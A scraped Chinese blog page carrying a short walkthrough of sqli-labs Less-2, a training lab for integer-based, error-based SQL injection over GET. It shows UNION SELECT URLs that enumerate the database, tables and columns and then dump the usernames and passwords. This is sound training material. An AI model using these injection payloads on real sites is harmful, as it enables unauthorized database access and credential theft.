当前位置:网站首页>sqli_libsLess-2 GET - Error based - Intiger based (基于错误的GET整型注入)
sqli_libsLess-2 GET - Error based - Intiger based (基于错误的GET整型注入)
2022-08-08 21:59:00 【XLXLXL.】
Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
1 hackbar注入
输入‘发现页面出错 此处应该有sql注入
通过比较可以得出此处是整型注入
然后进行union联合查询
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,database() --+
查出库的名称是security
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security‘ --+
对user表进行处理
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = ‘users’–+
对username password进行处理
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(‘用户名:’,username,‘密码:’,password) from users --+
拿到数据 结束
2 .sqlmap使用
1
2
3
4
5.
拿到数据 结束
边栏推荐
- 测试/开发程序员,如何跳出技术瓶颈?一年两年......
- 项目规范化标准介绍及相关实践
- 力扣每日一题----求第n位斐波那契数
- "New Infrastructure of Cultural Digital Strategy and Ecological Construction of Cultural Art Chain" was successfully held
- DCM: 中间件家族迎来新成员
- Contextual Transformer Networks for Visual Recognition paper and code analysis
- 百度 IP 查询
- 又来了!今天再分享几个Jupyter Notebook的使用技巧!
- 最近给公司撸了一个可视化大屏。
- 战投部都没了的字节,买了一家高端妇幼医院
猜你喜欢
随机推荐
抖音开启“818发现好物节”:电商平台造节活动何时休
并发场景下的死锁原因及规避解决方法
CrossFormer: A Versatile Vision Transformer -based on Cross - Scale Transformer paper and code parsing
为什么用了大牌工具后报表开发依然头疼
Pyramid Vision Transformer: A Versatile Backbone for Dense Prediction without Convolutions论文以及代码解析
What is the cURL?
n皇后求解单一解问题
Analysis of AutoAssign Papers
爬虫系列:存储 CSV 文件
文件上传接入阿里云OSS
【公开课预告】:AV1编码器的优化及其在流媒体和实时通讯中的应用
最近给公司撸了一个可视化大屏。
几款数据可视化大屏开源项目,科技感爆棚!太哇塞了~
The principle of neural network deep learning - 2
C + +环境设置
Shell脚本学习笔记
pyspark运行原理
SaaS启动阶段增长指南(上)
如何配合代理使用cURL?
2020上海智慧城市合作大会,零数科技受邀出席并入选优秀应用案例